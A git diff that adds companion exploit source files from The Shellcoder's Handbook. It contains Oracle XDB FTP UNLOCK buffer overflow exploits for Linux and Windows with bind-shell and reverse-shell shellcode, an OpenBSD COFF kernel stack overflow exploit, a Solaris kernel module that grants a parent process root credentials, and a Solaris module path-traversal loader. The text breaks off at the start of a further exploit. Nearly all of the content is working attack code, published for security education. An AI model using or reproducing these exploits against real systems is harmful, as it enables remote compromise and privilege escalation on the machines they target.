+int main(int argc, char *argv[])
+{
+
+     struct hostent *he;
+     struct sockaddr_in sa;
+     int sock;
+     unsigned int addr = 0;
+     char recvbuffer[512]="";
+     char user[260]="user ";
+     char passwd[260]="pass ";
+     int rcv=0;
+     int snd =0;
+     int count = 0;
+
+     unsigned char nop_sled[1804]="";
+
+     unsigned char saved_return_address[]="\x41\xc8\xff\xbf";
+
+     unsigned char exploit[2100]="unlock / AAAABBBBCCCCDDDDEE”
+       “EEFFFFGGGGHHHHIIIIJJJJKKKK”
+       “LLLLMMMMNNNNOOOOPPPPQQQ”
+       “QRRRRSSSSTTTTUUUUVVVVWWW”
+                           “WXXXXYYYYZZZZaaaabbbbccccdd";
+
+     unsigned char code[]="\x31\xdb\x53\x43\x53\x43\x53\x4b\x6a\x66\x58\x54\x59\xcd"
+                    "\x80\x50\x4b\x53\x53\x53\x66\x68\x41\x41\x43\x43\x66\x53"
+                    "\x54\x59\x6a\x10\x51\x50\x54\x59\x6a\x66\x58\xcd\x80\x58"
+                    "\x6a\x05\x50\x54\x59\x6a\x66\x58\x43\x43\xcd\x80\x58\x83"
+                    "\xec\x10\x54\x5a\x54\x52\x50\x54\x59\x6a\x66\x58\x43\xcd"
+                    "\x80\x50\x31\xc9\x5b\x6a\x3f\x58\xcd\x80\x41\x6a\x3f\x58"
+     "\xcd\x80\x41\x6a\x3f\x58\xcd\x80\x6a\x0b\x58\x99\x52\x68"
+     "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x54\x5b\x52\x53\x54"
+                    "\x59\xcd\x80\r\n";
+
+
+     if(argc !=4)
+     {
+          printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
+          printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
+          printf("\n\n\tSpawns a shell listening on TCP Port 16705");
+          printf("\n\n\tUsage:\t%s host userid password",argv[0]);
+          printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)”);
+printf(“\n\t7th July 2003\n\n\n");
+          return 0;
+     }
+
+     while(count < 1800)
+     {
+          nop_sled[count++]=0x90;
+     }
+
+     // Build the exploit
+     strcat(exploit,saved_return_address);
+     strcat(exploit,nop_sled);
+     strcat(exploit,code);
+
+     // Process arguments
+     strncat(user,argv[2],240);
+     strncat(passwd,argv[3],240);
+     strcat(user,"\r\n");
+     strcat(passwd,"\r\n");
+     
+
+     // Setup socket stuff
+     sa.sin_addr.s_addr=INADDR_ANY;
+     sa.sin_family = AF_INET;
+     sa.sin_port = htons((unsigned short) 2100);
+
+     // Resolve the target system
+     if(isalpha(argv[1][0])==0)
+     {
+          addr = inet_addr(argv[1]);
+          memcpy(&sa.sin_addr,&addr,4);
+     }
+     else
+     {
+          he = gethostbyname(argv[1]);
+          if(he == NULL)
+               return printf("Couldn't resolve host %s\n",argv[1]);
+          memcpy(&sa.sin_addr,he->h_addr,he->h_length);
+     }
+
+     sock = socket(AF_INET,SOCK_STREAM,0);
+     if(sock < 0)
+          return printf("socket() failed.\n");
+
+     if(connect(sock,(struct sockaddr *) &sa,sizeof(sa)) < 0)
+     {
+          close(sock);
+          return printf("connect() failed.\n");
+     }
+
+     printf("\nConnected to %s....\n",argv[1]);
+
+     // Receive and print banner
+     rcv = recv(sock,recvbuffer,508,0);
+     if(rcv > 0)
+     {
+          printf("%s\n",recvbuffer);
+          bzero(recvbuffer,rcv+1);
+     }
+     else
+     {
+          close(sock);
+          return printf("Problem with recv()\n");
+     }
+
+     // send user command
+     snd = send(sock,user,strlen(user),0);
+     if(snd != strlen(user))
+     {     close(sock);
+          return printf("Problem with send()....\n");
+     }
+     else
+     {
+          printf("%s",user);
+     }
+     
+     // Receive response. Response code should be 331
+     rcv = recv(sock,recvbuffer,508,0);
+     if(rcv > 0)
+     {
+
+          if(recvbuffer[0]==0x33  && recvbuffer[1]==0x33 && recvbuffer[2]==0x31)
+          {
+               printf("%s\n",recvbuffer);
+               bzero(recvbuffer,rcv+1);
+          }
+          else
+          {
+               close(sock);
+               return printf("FTP response code was not 331.\n");
+          }
+
+     }
+     else
+     {
+          close(sock);
+          return printf("Problem with recv()\n");
+     }
+
+
+     // Send pass command
+     snd = send(sock,passwd,strlen(passwd),0);
+     if(snd != strlen(user))
+     {
+          close(sock);
+          return printf("Problem with send()....\n");
+     }
+     else
+          printf("%s",passwd);
+
+     // Receive response. If not 230 login has failed.
+     rcv = recv(sock,recvbuffer,508,0);
+     if(rcv > 0)
+     {
+          if(recvbuffer[0]==0x32  && recvbuffer[1]==0x33 && recvbuffer[2]==0x30)
+          {
+               printf("%s\n",recvbuffer);
+               bzero(recvbuffer,rcv+1);
+          }
+          else
+          {
+               close(sock);
+               return printf("FTP response code was not 230. Login failed...\n");
+          }
+     }
+     else
+     {
+          close(sock);
+          return printf("Problem with recv()\n");
+     }
+
+     // Send the UNLOCK command with exploit
+     snd = send(sock,exploit,strlen(exploit),0);
+     if(snd != strlen(exploit))
+     {
+          close(sock);
+          return printf("Problem with send()....\n");
+     }
+
+
+     // Should receive a 550 error response.
+     rcv = recv(sock,recvbuffer,508,0);
+     if(rcv > 0)
+          printf("%s\n",recvbuffer);
+
+     printf("\n\nExploit code sent....\n\nNow telnet to %s 16705\n\n",argv[1]);
+     close(sock);
+     return 0;
+
+}
diff --git a/Chapter_22/Shellcoders22-xdb-exploit-win32.txt b/Chapter_22/Shellcoders22-xdb-exploit-win32.txt
new file mode 100644
index 0000000..aaef504
--- /dev/null
+++ b/Chapter_22/Shellcoders22-xdb-exploit-win32.txt
@@ -0,0 +1,233 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 22: Attacking Database Software
+Windows XDB overflow exploit
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+#include <winsock.h>
+
+int GainControlOfOracle(char *, char *);
+int StartWinsock(void);
+int SetUpExploit(char *,int);
+
+struct sockaddr_in s_sa;
+struct hostent *he;
+unsigned int addr;
+char host[260]="";
+
+
+unsigned char exploit[508]=
+"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
+"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
+"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
+"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
+"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
+"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
+"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
+"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
+"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
+"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
+"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
+"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
+"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
+"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
+"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
+"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
+"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
+"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
+"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
+"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
+"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
+"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
+"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
+"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
+"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
+"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
+"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
+"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
+"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
+"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
+"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
+"\xFF\xFF\xFF\xFF";
+
+char exploit_code[8000]=
+"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn"
+"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD"
+"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST"
+"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK"
+"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432"
+"1aaaabbbbcc";
+
+char exception_handler[8]="\x79\x9B\xf7\x77";
+char short_jump[8]="\xEB\x06\x90\x90";
+
+
+int main(int argc, char *argv[])
+{
+     
+     if(argc != 6)
+     {
+          printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
+          printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
+          printf("\n\n\tSpawns a reverse shell to specified port");
+          printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
+          printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)");
+          printf("\n\t6th July 2003\n\n\n");
+          return 0;
+     }
+
+     strncpy(host,argv[1],250);
+     if(StartWinsock()==0)
+          return printf("Error starting Winsock.\n");
+
+     SetUpExploit(argv[4],atoi(argv[5]));
+
+     strcat(exploit_code,short_jump);
+     strcat(exploit_code,exception_handler);
+     strcat(exploit_code,exploit);
+     strcat(exploit_code,"\r\n");
+
+     GainControlOfOracle(argv[2],argv[3]);
+          
+     return 0;
+
+}          
+
+
+int SetUpExploit(char *myip, int myport)
+{
+     unsigned int ip=0;
+     unsigned short prt=0;
+     char *ipt="";
+     char *prtt="";
+
+     ip = inet_addr(myip);
+
+     ipt = (char*)&ip;
+     exploit[191]=ipt[0];
+     exploit[192]=ipt[1];
+     exploit[193]=ipt[2];
+     exploit[194]=ipt[3];
+
+     // set the TCP port to connect on
+     // netcat should be listening on this port
+     // e.g. nc -l -p 80
+
+     prt = htons((unsigned short)myport);
+     prt = prt ^ 0xFFFF;
+     prtt = (char *) &prt;
+     exploit[209]=prtt[0];
+     exploit[210]=prtt[1];
+
+     return 0;
+}
+
+
+int StartWinsock()
+{
+     int err=0;
+     WORD wVersionRequested;
+     WSADATA wsaData;
+
+     wVersionRequested = MAKEWORD( 2, 0 );
+     err = WSAStartup( wVersionRequested, &wsaData );
+     if ( err != 0 )
+          return 0;
+     if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
+       {
+          WSACleanup( );
+          return 0;
+     }
+
+     if (isalpha(host[0]))
+     {
+          he = gethostbyname(host);
+          s_sa.sin_addr.s_addr=INADDR_ANY;
+          s_sa.sin_family=AF_INET;
+          memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
+       }
+     else
+     {
+          addr = inet_addr(host);
+          s_sa.sin_addr.s_addr=INADDR_ANY;
+          s_sa.sin_family=AF_INET;
+          memcpy(&s_sa.sin_addr,&addr,4);
+          he = (struct hostent *)1;
+     }
+
+     if (he == NULL)
+       {
+          return 0;
+       }
+     return 1;
+}
+
+
+
+int GainControlOfOracle(char *user, char *pass)
+{
+
+     char usercmd[260]="user ";
+     char passcmd[260]="pass ";
+     char resp[1600]="";
+     int snd=0,rcv=0;
+     struct sockaddr_in r_addr;
+     SOCKET sock;
+
+
+     strncat(usercmd,user,230);
+     strcat(usercmd,"\r\n");
+     strncat(passcmd,pass,230);
+     strcat(passcmd,"\r\n");
+
+
+     sock=socket(AF_INET,SOCK_STREAM,0);
+     if (sock==INVALID_SOCKET)
+         return printf(" sock error");
+
+     r_addr.sin_family=AF_INET;
+     r_addr.sin_addr.s_addr=INADDR_ANY;        
+     r_addr.sin_port=htons((unsigned short)0);
+     s_sa.sin_port=htons((unsigned short)2100);
+
+     
+     if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
+          return printf("Connect error");
+
+     rcv = recv(sock,resp,1500,0);
+     printf("%s",resp);
+     ZeroMemory(resp,1600);
+
+    snd=send(sock, usercmd , strlen(usercmd) , 0);
+     rcv = recv(sock,resp,1500,0);
+     printf("%s",resp);
+     ZeroMemory(resp,1600);
+
+    snd=send(sock, passcmd , strlen(passcmd) , 0);
+     rcv = recv(sock,resp,1500,0);
+     printf("%s",resp);
+     if(resp[0]=='5')
+     {
+          closesocket(sock);
+          return printf("Failed to log in using user %s and password %s.\n",user,pass);
+     }
+     ZeroMemory(resp,1600);
+
+     snd=send(sock, exploit_code, strlen(exploit_code) , 0);
+
+     Sleep(2000);
+
+     closesocket(sock);
+     return 0;
+}
diff --git a/Chapter_23/Shellcoders23-OpenBSD-select()-exploit.txt b/Chapter_23/Shellcoders23-OpenBSD-select()-exploit.txt
new file mode 100644
index 0000000..b28ea55
--- /dev/null
+++ b/Chapter_23/Shellcoders23-OpenBSD-select()-exploit.txt
@@ -0,0 +1,53 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 23: Kernel Overflows
+OpenBSD select() kernel stack buffer overflow
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+sys_select(p, v, retval)
+        register struct proc *p;
+        void *v;
+        register_t *retval;
+{
+        register struct sys_select_args /* {
+                syscallarg(int) nd;
+                syscallarg(fd_set *) in;
+                syscallarg(fd_set *) ou;
+                syscallarg(fd_set *) ex;
+                syscallarg(struct timeval *) tv;
+        } */ *uap = v;
+        fd_set bits[6], *pibits[3], *pobits[3];
+        struct timeval atv;
+        int s, ncoll, error = 0, timo;
+        u_int ni;
+
+[1]     if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {
+                /* forgiving; slightly wrong */
+                SCARG(uap, nd) = p->p_fd->fd_nfiles;
+        }
+[2]     ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);
+[3]     if (SCARG(uap, nd) > FD_SETSIZE) {
+
+        [deleted]
+
+#define getbits(name, x) 
+[4]   if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), 
+            (caddr_t)pibits[x], ni))) 
+                goto done;
+[5]     getbits(in, 0);
+        getbits(ou, 1);
+        getbits(ex, 2);
+#undef  getbits
+
+     [deleted]
diff --git a/Chapter_24/Shellcoders24-OpenBSD-exploit1-c.txt b/Chapter_24/Shellcoders24-OpenBSD-exploit1-c.txt
new file mode 100644
index 0000000..b95c240
--- /dev/null
+++ b/Chapter_24/Shellcoders24-OpenBSD-exploit1-c.txt
@@ -0,0 +1,232 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 24: Kernel Exploits
+obsd_ex1.c
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+------------------------------ obsd_ex1.c ---------------------------------
+
+/**     (c) 2003 Sinan "noir" Eren                              **/
+/**     noir@olympos.org | noir@uberhax0r.net                    **/
+
+/** creates a fake COFF executable with large .shlib section size **/
+ 
+#include <stdio.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/param.h>
+#include <sys/sysctl.h>
+#include <sys/signal.h>
+
+unsigned char shellcode[] =
+"\xcc\xcc"; /* only int3 (debug interrupt) at the moment */
+
+#define ZERO(p) memset(&p, 0x00, sizeof(p))
+
+/*
+ * COFF file header
+ */
+
+struct coff_filehdr {
+    u_short     f_magic;        /* magic number */
+    u_short     f_nscns;        /* # of sections */
+    long        f_timdat;       /* timestamp */
+    long        f_symptr;       /* file offset of symbol table */
+    long        f_nsyms;        /* # of symbol table entries */
+    u_short     f_opthdr;       /* size of optional header */
+    u_short     f_flags;        /* flags */
+};
+
+/* f_magic flags */
+#define COFF_MAGIC_I386 0x14c
+
+/* f_flags */
+#define COFF_F_RELFLG   0x1
+#define COFF_F_EXEC     0x2
+#define COFF_F_LNNO     0x4
+#define COFF_F_LSYMS    0x8
+#define COFF_F_SWABD    0x40
+#define COFF_F_AR16WR   0x80
+#define COFF_F_AR32WR   0x100
+
+/*
+ * COFF system header
+ */
+
+struct coff_aouthdr {
+    short       a_magic;
+    short       a_vstamp;
+    long        a_tsize;
+    long        a_dsize;
+    long        a_bsize;
+    long        a_entry;
+    long        a_tstart;
+    long        a_dstart;
+};
+
+/* magic */
+#define COFF_ZMAGIC     0413
+
+/*
+ * COFF section header
+ */
+
+struct coff_scnhdr {
+    char        s_name[8];
+    long        s_paddr;
+    long        s_vaddr;
+    long        s_size;
+    long        s_scnptr;
+    long        s_relptr;
+    long        s_lnnoptr;
+    u_short     s_nreloc;
+    u_short     s_nlnno;
+    long        s_flags;
+};
+
+/* s_flags */
+#define COFF_STYP_TEXT          0x20
+#define COFF_STYP_DATA          0x40
+#define COFF_STYP_SHLIB         0x800
+
+int
+main(int argc, char **argv)
+{
+  u_int i, fd, debug = 0;
+  u_char *ptr, *shptr;
+  u_long *lptr, offset;
+  char *args[] = { "./ibcs2own", NULL};
+  char *envs[] = { "RIP=theo", NULL};
+  //COFF structures
+  struct coff_filehdr fhdr;
+  struct coff_aouthdr ahdr;
+  struct coff_scnhdr  scn0, scn1, scn2;
+
+   if(argv[1]) {
+      if(!strncmp(argv[1], "-v", 2))
+              debug = 1;
+      else {
+              printf("-v: verbose flag only\n");
+              exit(0);
+            }
+    }
+
+    ZERO(fhdr);
+    fhdr.f_magic = COFF_MAGIC_I386;
+    fhdr.f_nscns = 3; //TEXT, DATA, SHLIB
+    fhdr.f_timdat = 0xdeadbeef;
+    fhdr.f_symptr = 0x4000;
+    fhdr.f_nsyms = 1;
+    fhdr.f_opthdr = sizeof(ahdr); //AOUT header size
+    fhdr.f_flags = COFF_F_EXEC;
+
+    ZERO(ahdr);
+    ahdr.a_magic = COFF_ZMAGIC;
+    ahdr.a_tsize = 0;
+    ahdr.a_dsize = 0;
+    ahdr.a_bsize = 0;
+    ahdr.a_entry = 0x10000;
+    ahdr.a_tstart = 0;
+    ahdr.a_dstart = 0;
+
+    ZERO(scn0);
+    memcpy(&scn0.s_name, ".text", 5);
+    scn0.s_paddr = 0x10000;
+    scn0.s_vaddr = 0x10000;
+    scn0.s_size = 4096;
+    //file offset of .text segment
+    scn0.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3);
+    scn0.s_relptr = 0;
+    scn0.s_lnnoptr = 0;
+    scn0.s_nreloc = 0;
+    scn0.s_nlnno = 0;
+    scn0.s_flags = COFF_STYP_TEXT;
+
+    ZERO(scn1);
+    memcpy(&scn1.s_name, ".data", 5);
+    scn1.s_paddr = 0x10000 - 4096;
+    scn1.s_vaddr = 0x10000 - 4096;
+    scn1.s_size = 4096;
+    //file offset of .data segment
+    scn1.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 4096;
+    scn1.s_relptr = 0;
+    scn1.s_lnnoptr = 0;
+    scn1.s_nreloc = 0;
+    scn1.s_nlnno = 0;
+    scn1.s_flags = COFF_STYP_DATA;
+
+    ZERO(scn2);
+    memcpy(&scn2.s_name, ".shlib", 6);
+    scn2.s_paddr = 0;
+    scn2.s_vaddr = 0;
+
+    //overflow vector!!!
+    scn2.s_size = 0xb0; /* offset from start of buffer to saved eip */
+
+    //file offset of .shlib segment
+    scn2.s_scnptr = sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + (2*4096);
+    scn2.s_relptr = 0;
+    scn2.s_lnnoptr = 0;
+    scn2.s_nreloc = 0;
+    scn2.s_nlnno = 0;
+    scn2.s_flags = COFF_STYP_SHLIB;
+
+    ptr = (char *) malloc(sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + \
+                 3*4096);
+    memset(ptr, 0xcc, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0)*3) + 3*4096);
+
+
+    memcpy(ptr, (char *) &fhdr, sizeof(fhdr));
+    offset = sizeof(fhdr);
+     
+    memcpy((char *) (ptr+offset), (char *) &ahdr, sizeof(ahdr));
+    offset += sizeof(ahdr);
+
+    memcpy((char *) (ptr+offset), (char *) &scn0, sizeof(scn0));
+    offset += sizeof(scn0);
+
+    memcpy((char *) (ptr+offset), (char *) &scn1, sizeof(scn1));
+    offset += sizeof(scn1);
+
+    memcpy((char *) (ptr+offset), (char *) &scn2, sizeof(scn2));
+
+    lptr = (u_long *) ((char *)ptr + sizeof(fhdr) + sizeof(ahdr) + \
+           (sizeof(scn0)*3) + (2*4096) + 0xb0 - 8);
+
+    shptr = (char *) malloc(4096);
+    if(debug)
+      printf("payload adr: 0x%.8x\n", shptr);
+    memset(shptr, 0xcc, 4096);
+
+    *lptr++ = 0xdeadbeef;
+    *lptr = (u_long) shptr;
+
+    memcpy(shptr, shellcode, sizeof(shellcode)-1);
+
+    unlink("./ibcs2own"); /* remove the left overs from prior executions */
+
+    if((fd = open("./ibcs2own", O_CREAT^O_RDWR, 0755)) < 0) {
+                perror("open");
+                exit(-1);
+        }
+
+    write(fd, ptr, sizeof(fhdr) + sizeof(ahdr) + (sizeof(scn0) * 3) + (4096*3));
+    close(fd);
+    free(ptr);
+
+    execve(args[0], args, envs);
+    perror("execve");
+
+}
diff --git a/Chapter_24/Shellcoders24-moka-c.txt b/Chapter_24/Shellcoders24-moka-c.txt
new file mode 100644
index 0000000..6144c07
--- /dev/null
+++ b/Chapter_24/Shellcoders24-moka-c.txt
@@ -0,0 +1,118 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 24: Kernel Exploits
+moka.c
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+----------------------------- moka.c ------------------------------------------
+
+#include <sys/systm.h>
+#include <sys/ddi.h>
+#include <sys/sunddi.h>
+#include <sys/cred.h>
+#include <sys/types.h>
+#include <sys/proc.h>
+#include <sys/procfs.h>
+#include <sys/kmem.h>
+#include <sys/errno.h>
+#include <fcntl.h>
+#include <unistd.h>
+
+#include <sys/modctl.h>
+extern struct mod_ops mod_miscops;
+
+int g3mm3(void);
+
+int g3mm3()
+{
+
+  register proc_t *p;
+  register proc_t *pp;
+  cred_t *cr, *newcr;
+
+    mutex_enter(&pidlock);
+      for (p = practive; p != NULL; p = p->p_next) {
+
+             if(strstr(p->p_user.u_comm, (char *) "o0o0")) {
+
+                pp = p->p_parent;
+                newcr = crget();
+
+                mutex_enter(&pp->p_crlock);
+                cr = pp->p_cred;
+                crcopy_to(cr, newcr);
+                pp->p_cred = newcr;
+                newcr->cr_uid = 0;
+                mutex_exit(&pp->p_crlock);
+
+              }
+
+          continue;
+
+        }
+
+    mutex_exit(&pidlock);
+
+    return 1;
+}
+
+static struct modlmisc modlmisc =
+{
+    &mod_miscops,
+    "u_comm"
+};
+
+static struct modlinkage modlinkage =
+{
+    MODREV_1,
+    (void *) &modlmisc,
+    NULL
+};
+
+int _init(void)
+{
+    int i;
+
+    if ((i = mod_install(&modlinkage)) != 0)
+        //cmn_err(CE_NOTE, "");
+                ;
+#ifdef _DEBUG
+    else
+        cmn_err(CE_NOTE, "0o0o0o0o installed o0o0o0o0o0o0");
+#endif
+
+    i = g3mm3();
+    return i;
+}
+
+int _info(struct modinfo *modinfop)
+{
+    return (mod_info(&modlinkage, modinfop));
+}
+
+
+int _fini(void)
+{
+    int i;
+
+    if ((i = mod_remove(&modlinkage)) != 0)
+        //cmn_err(CE_NOTE, "not removed");
+                ;
+#ifdef DEBUG
+    else
+        cmn_err(CE_NOTE, "removed");
+#endif
+
+    return i;
+}
diff --git a/Chapter_24/Shellcoders24-solaris-vfs_getvfssw()-exploit.txt b/Chapter_24/Shellcoders24-solaris-vfs_getvfssw()-exploit.txt
new file mode 100644
index 0000000..90b803a
--- /dev/null
+++ b/Chapter_24/Shellcoders24-solaris-vfs_getvfssw()-exploit.txt
@@ -0,0 +1,78 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 24: Kernel Exploits
+Solaris vfs_getvfssw() Loadable Kernel Module Path Traversal Exploit
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+------------ o0o0.c ----------
+#include <stdio.h>
+#include <sys/fstyp.h>
+#include <sys/fsid.h>
+#include <sys/systeminfo.h>
+
+/*int sysfs(int opcode, const char *fsname); */
+
+int
+main(int argc, char **argv)
+{
+  char modname[] = "../../../tmp/o0";
+  char buf[4096];
+  char ver[32], *ptr;
+  int sixtyfour = 0;
+
+    memset((char *) buf, 0x00, 4096);
+    if(sysinfo(SI_ISALIST, (char *) buf, 4095) < 0) {
+        perror("sysinfo");
+        exit(0);
+     }
+
+     if(strstr(buf, "sparcv9"))
+        sixtyfour = 1;
+  
+     memset((char *) ver, 0x00, 32);
+     if(sysinfo(SI_RELEASE, (char *) ver, 32) < 0) {
+        perror("sysinfo");
+        exit(0);
+     }
+ 
+     ptr = (char *) strstr(ver, ".");
+     if(!ptr) {
+         fprintf(stderr, "can't grab release version!\n");
+         exit(0);
+     } 
+     ptr++;
+     
+     memset((char *) buf, 0x00, 4096);
+     if(sixtyfour)
+       snprintf(buf, sizeof(buf)-1, "cp ./%s/o064 /tmp/sparcv9/o0", ptr); 
+     else
+       snprintf(buf, sizeof(buf)-1, "cp ./%s/o032 /tmp/o0", ptr);
+
+     if(sixtyfour) 
+        if(mkdir("/tmp/sparcv9", 0755) < 0) {
+            perror("mkdir");
+            exit(0);
+        }
+
+    system(buf);
+ 
+    sysfs(GETFSIND, modname);
+        //perror("hoe!");
+
+   if(sixtyfour)
+        system("/usr/bin/rm -rf /tmp/sparcv9");
+     else
+        system("/usr/bin/rm -f /tmp/o0");
+
+}
diff --git a/Chapter_24/Shellcoders24exec_ibcs2_coff_prep_zmagic()-exploit.txt b/Chapter_24/Shellcoders24exec_ibcs2_coff_prep_zmagic()-exploit.txt
new file mode 100644
index 0000000..aa99e9a
--- /dev/null
+++ b/Chapter_24/Shellcoders24exec_ibcs2_coff_prep_zmagic()-exploit.txt
@@ -0,0 +1,319 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 24: Kernel Exploits
+exec_ibcs2_coff_prep_zmagic() kernel stack overflow
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+----------------------------- coff_ex.c --------------------------------------
+
+/** OpenBSD 2.x - 3.3                                            **/
+/** exec_ibcs2_coff_prep_zmagic() kernel stack overflow          **/ 
+/** note: ibcs2 binary compatibility with SCO and ISC is enabled **/
+/** in the default install                                       **/
+
+/**     Copyright Feb 26 2003 Sinan "noir" Eren                  **/ 
+/**     noir@olympos.org | noir@uberhax0r.net                    **/
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <fcntl.h>
